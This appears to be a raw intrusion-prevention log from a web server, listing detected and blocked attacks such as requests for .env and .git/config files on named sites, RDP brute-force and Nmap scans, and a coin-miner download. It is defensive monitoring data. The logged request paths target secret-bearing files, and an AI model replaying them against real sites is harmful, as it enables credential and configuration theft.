000003cc	01dc9487c4d1d5fc	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94879e8c754c	01dc94879e8c754c	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlFOEJCMTYxLTk0ODctMTFGMS04MTgzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000ad56	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env.production.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc9487c4d1d5fc	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc94879f7156e8	01dc94879f7156e8	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlGNkUyRjQ5LTk0ODctMTFGMS04MUUyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000ad56	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc9487c8240bbf	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487a13657ed	01dc9487a13657ed	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkExMzVFNzQwLTk0ODctMTFGMS04MEExLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008ff4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env.example			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc9487c8240bbf	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487a1e2007d	01dc9487a1e2007d	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkExRTFEQzhGLTk0ODctMTFGMS04MEU5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008ff4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env.stage			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9487cb74ad60	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487a46259ab	01dc9487a46259ab	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE0NjAwOURGLTk0ODctMTFGMS04M0Y1LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009002	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env.old			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9487cec7e554	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487a846de63	01dc9487a846de63	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE4NDQ1NjRFLTk0ODctMTFGMS04NTk3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000dfae	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/.env.prod			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9487d8c178b9	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487b2e751b9	01dc9487b2e751b9	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkIyRTQxQkNFLTk0ODctMTFGMS1CODBDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b87c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/crm/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc9487d8c178b9	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487b3955fcb	01dc9487b3955fcb	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkIzOTIyOUZGLTk0ODctMTFGMS1CODU1LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b87c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/local/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9487dc0f9998	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487b55337ee	01dc9487b55337ee	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI1NTI2NzNCLTk0ODctMTFGMS1CQjExLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b888	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/core/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c0	01dc9487dc0f9998	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487b6378d36	01dc9487b6378d36	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI2MzUzMUU4LTk0ODctMTFGMS1CQjcwLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b888	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/apps/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c7	01dc9487dc0f9998	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487b712b36b	01dc9487b712b36b	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI3MTFERjc2LTk0ODctMTFGMS1CQkNDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b888	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/application/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9487df62c4b4	000000ce	0000000f	164a8367	216eb2c3	00000002	00000002	00000001	01dc9487b899c8f7	01dc9487b899c8f7	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI3QjhDN0VFLTk0ODctMTFGMS1CQTEyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b888	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://straumannvietnam.com/web/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000213	01dc9489ad37b232	000000cf	00000007	164a8367	75f9f868	00000001	00000000	00000001	01dc9489aba260f6	01dc948b11431cf6	00000001	00000000	The client will block traffic from IP address 104.248.249.117 for the next 600 seconds (from 2/3/2026 4:19:52 AM to 2/3/2026 4:29:52 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000363	01dc9489d1c92ab2	000000ce	0000000f	164a8367	75f9f868	00000002	00000002	00000001	01dc9489ab704f4b	01dc9489ab704f4b	00000001	00000110	[SID: 33389] Audit: RDP Bruteforce Attempt 3 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFCNkRDOEU2LTk0ODktMTFGMS1BREE5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzODksIm5hbWUiOiJBdWRpdDogUkRQIEJydXRlZm9yY2UgQXR0ZW1wdCAzIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		0000826d	00010001	00000002	00000002	00005f0d	000001bb	00000000000000000000000000000000	00000000000000000000000000000000	Audit: RDP Bruteforce Attempt 3				14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000036b	01dc9489d1c92ab2	000000ce	00000003	164a8367	75f9f868	00000002	00000001	00000001	01dc9489ab75147c	01dc9489ab75147c	00000001	00000110	[SID: 34618] Attack: Nmap RDP Scan Attempt attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFCNkRDOEU1LTk0ODktMTFGMS1BREE5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQ2MTgsIm5hbWUiOiJBdHRhY2s6IE5tYXAgUkRQIFNjYW4gQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000873a	00010000	00000002	00000002	00005f0d	000001bb	00000000000000000000000000000000	00000000000000000000000000000000	Attack: Nmap RDP Scan Attempt				14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000212	01dc948a852c683a	000000cf	00000007	164a8367	7abc16a5	00000001	00000000	00000001	01dc948a836040b7	01dc948be900fcb7	00000001	00000000	The client will block traffic from IP address 165.22.188.122 for the next 600 seconds (from 2/3/2026 4:25:54 AM to 2/3/2026 4:35:54 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003a1	01dc948aa9be981a	000000ce	00000003	164a8367	7abc16a5	00000002	00000001	00000001	01dc948a834acb58	01dc948a834acb58	00000001	00000114	[SID: 34823] Attack: Malicious Scan Request 44 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjgzNDlGQTk2LTk0OEEtMTFGMS05NjMzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQ4MjMsIm5hbWUiOiJBdHRhY2s6IE1hbGljaW91cyBTY2FuIFJlcXVlc3QgNDQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00008807	00010000	00000002	00000002	0000b654	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Attack: Malicious Scan Request 44	http://103.131.74.22/systembc/password.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000396	01dc948b176ec5fa	000000ce	0000000f	164a8367	b7d16a57	00000002	00000002	00000001	01dc948af0e6e48a	01dc948af0e6e48a	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkYwRTYxMDg2LTk0OEEtMTFGMS1BNDJDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000c873	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://demo.quangcaotrena.com.vn/userfuns.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000217	01dc948b3553d758	000000d3	0000000f	164a8367	75f9f868	00000001	00000000	00000000	01dc948b114460f3	01dc948b114460f3	00000001	00000000	Active Response that started at 2/3/2026 4:19:52 AM is disengaged. The traffic from IP address 104.248.249.117 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b7	01dc948ba653e7f8	000000ce	0000000f	164a8367	ee0a942d	00000002	00000002	00000001	01dc948b81e8697f	01dc948b81e8697f	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjgxRTU0NkJDLTk0OEItMTFGMS1BMEZDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000a65e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://taxinamthang.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc948bcad596d5	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc948bc9771efa	01dc948d2f17dafa	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 4:35:01 AM to 2/3/2026 4:45:01 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc948bef5ea0d8	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc948bc9155b4f	01dc948bc9155b4f	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ2MDU2LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDY3OTI3NzE1LCJ1aWQiOiIzQzQ1Mzc4Qy0wMDdFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJDOTEyNDlCMi05NDhCLTExRjEtOEVENi0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG1hMTUxM2UyMi0zMzFjLTQ0NDgtYjExZS00OGMxNmVlYWJiNTYgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoxODY4OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA2NzYwNjc4MSwidWlkIjoiQjFDMkQ0MDctMDA3RC1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000cf78	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770068097.5348579883575439453125			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000216	01dc948c1097bb94	000000d3	0000000f	164a8367	7abc16a5	00000001	00000000	00000000	01dc948be9b03c6c	01dc948be9b03c6c	00000001	00000000	Active Response that started at 2/3/2026 4:25:54 AM is disengaged. The traffic from IP address 165.22.188.122 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000215	01dc948d562b0383	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc948d2fb257a1	01dc948d2fb257a1	00000001	00000000	Active Response that started at 2/3/2026 4:35:01 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003a2	01dc948e8e819680	000000ce	0000000f	164a8367	f70a942d	00000002	00000002	00000001	01dc948e6a78e107	01dc948e6a78e107	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZBNzdBMzgzLTk0OEUtMTFGMS1BQjQ2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	000087f0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://binhkhanhsteel.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
